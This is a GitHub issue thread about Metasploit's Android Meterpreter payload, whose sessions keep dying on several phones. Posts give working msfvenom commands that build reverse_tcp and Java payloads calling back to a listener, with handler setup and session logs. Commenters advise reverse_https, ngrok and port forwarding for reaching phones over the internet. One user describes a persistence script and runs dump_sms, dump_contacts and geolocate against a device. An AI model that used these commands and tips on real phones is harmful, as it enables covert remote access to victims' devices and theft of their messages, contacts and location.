rapid7/meterpreter

Android meterpreter crashes (Android L 5.0.1)

comertcimen opened this issue · 32 comments

To reproduce:
(1) Generate a .apk file for Android Meterpreter

msfvenom -p android/meterpreter/reverse_tcp LHOST=192.168.1.12 LPORT=4444 R > Android.apk

(2) Create a handler for Android Meterpreter (on Armitage)

msf > use exploit/multi/handler
msf exploit(handler) > set LHOST 192.168.1.12
LHOST => 192.168.1.12
msf exploit(handler) > set DisablePayloadHandler false
DisablePayloadHandler => false
msf exploit(handler) > set LPORT 4444
LPORT => 4444
msf exploit(handler) > set PAYLOAD android/meterpreter/reverse_tcp
PAYLOAD => android/meterpreter/reverse_tcp
msf exploit(handler) > set TARGET 0
TARGET => 0
msf exploit(handler) > set ExitOnSession false
ExitOnSession => false
msf exploit(handler) > exploit -j
[*] Exploit running as background job.
[*] Started reverse handler on 192.168.1.12:4444
[*] Starting the payload handler...
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] 78.162.55.92 - Meterpreter session 1 closed. Reason: Died
[*] Meterpreter session 1 opened (127.0.0.1 -> 78.162.55.92:51289) at 2015-07-23 22:12:51 +0300
[-] Meterpreter session 1 is not valid and will be closed
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] Meterpreter session 2 opened (192.168.1.12:4444 -> 78.162.55.92:38172) at 2015-07-23 22:12:55 +0300
[*] 78.162.55.92 - Meterpreter session 2 closed. Reason: Died
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] Meterpreter session 3 opened (192.168.1.12:4444 -> 78.162.55.92:36417) at 2015-07-23 22:13:21 +0300
[*] 78.162.55.92 - Meterpreter session 3 closed. Reason: Died
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] Meterpreter session 4 opened (192.168.1.12:4444 -> 78.162.55.92:52956) at 2015-07-23 22:17:07 +0300
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] Meterpreter session 5 opened (192.168.1.12:4444 -> 78.162.55.92:48955) at 2015-07-23 22:17:09 +0300
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] Meterpreter session 6 opened (192.168.1.12:4444 -> 78.162.55.92:44943) at 2015-07-23 22:17:10 +0300
[*] Sending stage (50643 bytes) to 78.162.55.92
[*] Meterpreter session 7 opened (192.168.1.12:4444 -> 78.162.55.92:40981) at 2015-07-23 22:17:11 +0300
[*] 78.162.55.92 - Meterpreter session 4 closed. Reason: Died
[*] 78.162.55.92 - Meterpreter session 5 closed. Reason: Died
[*] 78.162.55.92 - Meterpreter session 6 closed. Reason: Died
[*] 78.162.55.92 - Meterpreter session 7 closed. Reason: Died
[-] Failed to load extension: No response was received to the core_enumextcmd request.

So what is the problem?

timwr commented

I can't reproduce this on a 5.0.1 emulator with rapid7/metasploit-framework@50c9293. Which device/emulator? Could you try set AutoVerifySession false on the handler please? Also could you provide the output from adb logcat?
Thanks for reporting!
P.S. You might want to report this on https://github.com/rapid7/metasploit-framework or https://github.com/rapid7/metasploit-payloads, as this repository is deprecated.

OJ commented

Looks like your binaries are out of date to me. Are you using Kali?

@timwr I tried on Samsung Galaxy Note 4. I'll try it.
@OJ Yes, I am using Kali.

Anyone got this to work?

OJ commented

I'm having no issues at all. But I don't have a Galaxy note. It still looks like out of date binaries to me.

I've been using Android M a lot lately with no issues either.

I use android/meterpreter/reverse_https on a Samsung Galaxy Note 4 with Android 5, because reverse_tcp crashes and says connection closed. Died

How do I use reverse_https? Use it with set PAYLOAD alone, or make the .apk first using msfvenom and after that use the payload set command?

I tried reverse_tcp with my Nexus 5 phone, Android 6.01 M, and it got meterpreter session closed! Any idea?

@khanfar reverse_https has to be set both with msfvenom .apk (use port 8443) and payload (leave lport as default)

In my case, the reverse_https meterpreter session dies after 20/30 sec, and reverse_tcp also dies (but in a lucky case it is open for more than a minute).
(Tried on Galaxy S6, Lollipop, with Kali on VMware.)

I don't know if the app is closed by the Android OS or if it crashes (I cannot get a logcat right now); it seems that something wrong happens on the client side (on the Android terminal).

Apparently it is when the screen locks

That's not a crash, that's just the phone going to sleep and killing idle applications. The change to convert this to work as a service is in now, you can try it out now if you want to build the latest android meterpreter directly from the master branch of metasploit-payloads.

Got mine working: update the SDK accordingly and use the exploit -j command to session

I'm facing the same issue right now. I'm using metasploit version metasploit v4.13.1-dev-ec020e3d079ad1959418220409995f033ab3d409

Session is closed in 10 seconds! I tried it on Android L 5.1

I have the same issues. I have built the reverse_tcp meterpreter for android and set up persistent script for it to run the MainActivity every 20 seconds or so. It works across reboots but now on most commands the session dies and it will not re-connect the meterpreter shell until the next reboot.


Session #1 - Dies running dump_sms
msf exploit(handler) > [*] Sending stage (xxxxx bytes) to x.x.x.x
[*] Meterpreter session 1 opened (x.x.x.x:443 -> x.x.x.x:random-port) at date-stamp

msf exploit(handler) > sessions -i 1
[*] Starting interaction with 1...

meterpreter > dump_sms

[*] x.x.x.x- Meterpreter session 1 closed. Reason: Died

Session #2 - Dies running wlan_geolocate
meterpreter > dump_contacts
[-] Error running command dump_contacts: Rex::TimeoutError Operation timed out.
meterpreter > geolocate
[-] android_geolocate: Operation failed: 1
meterpreter > wlan_geolocate

[*] x.x.x.x- Meterpreter session 2 closed. Reason: Died


Busterb - you mention there is a newer version of the android meterpreter that I can use that may solve this? I am running Kali Linux and the latest version of metasploit-framework: Framework Version: 4.14.1-dev. Should I re-install from GitHub or do I have the latest scripts for everything? Any ideas why this would be occurring? It is notable to mention that most commands fail in general - such as I cannot gather audio of more than 20 seconds - and cannot dump call log, geolocate and most others have an error or fail and cause disconnection.

I just did a new clean install of Debian and installed metasploit-framework from GitHub and still have the same issues. The android meterpreter doesn't work for most commands - it just crashes when trying any commands, like in my last post.

Same here.
But...
the session is dying only when the phone (LG G5, ver: 6.0.1) is connected to 4G.
When the phone is connected to Wi-Fi it works just fine.
BTW, I am using a VPS (virtual private server).
Got a few theories:
1. The internet speed matters (upload and download)
2. The ISP (Internet service provider) blocks it

So, could just be a timeout over slow networks.

As I experienced Reverse_tcp works well on Redmi 2 but not on Samsung Galaxy J5
So it is not a crash.
Else working on it...

@n30tr3x is right, using reverse_https solves the problem.

I am seeing the same problem with java/meterpreter/reverse_tcp payload.

Jar:
msfvenom -f raw -p java/meterpreter/reverse_tcp LHOST=172.16.189.167 LPORT=4444 -o ~/Desktop/meterpreter.jar

Handler:

Payload options (java/meterpreter/reverse_tcp):
Name   Current Setting  Required  Description
----   ---------------  --------  -----------
LHOST  172.16.189.167   yes       The listen address
LPORT  4444             yes       The listen port

Error messages below:

msf exploit(handler) > run
[*] Started reverse TCP handler on 172.16.189.167:4444 
[*] Starting the payload handler...
[*] Sending stage (49645 bytes) to 172.16.189.158
[*] Meterpreter session 9 opened (172.16.189.167:4444 -> 172.16.189.158:49158) at 2017-09-21 23:31:14 -0400

meterpreter > 
[*] 172.16.189.158 - Meterpreter session 9 closed.  Reason: Died

@n3otr3x I am new and not sure how to set up the https payload. Is it basically the same as a tcp one, where I would make the apk and then install it on the device?

Try Using Stageless payload
Meterpreter_reverse_https

Mostly it's an issue with the type of the mobile phone you are using
Not a Bug in Metasploit

[*] Started reverse TCP handler on 0.0.0.0:4444
Error help

I babe the same problem with android/meterpreter/reverse_http. On LAN it works, but on WAN it says meterpreter session 1 opened but doesn't start meterpreter. I cancel the exploit with Ctrl+C and type sessions 1 and meterpreter opens, but when I type help only the general commands appear, not the android commands... Please help me

Have*

Don't use LHOST = 0.0.0.0

LHOST is the address that will be embedded into the payload for it to connect to. If you don't have LHOST as a specific, routable address, you will not be able to connect the payload to it.

I use LHOST = ddns ip

First update metasploit to version 4.16.40-dev via GitHub and use the free installer to install it. Then, to fix this problem, open the folder ngrok is located in and type ./ngrok tcp whatever port you're using.

[*] Started reverse TCP handler on 0.0.0.0:4444
Error help

I think it's a port forwarding problem. If you use no-ip, do not forget to update via console, and also set NAT on the router for port 4444

Hi fellow hackers, you might want to stop using Armitage. I know it's much more comfortable, but remember, as it is a GUI that controls metasploit, you are limited to what Armitage offers and not to what metasploit offers. For example, I found out that first of all Armitage is much slower; second, when you type the command 'shell' on a meterpreter session in Armitage, it does not work. Metasploit is just so much better and it might work with metasploit, give it a try.
It takes time to get used to metasploit but it is much faster and much more powerful

exploit -j -z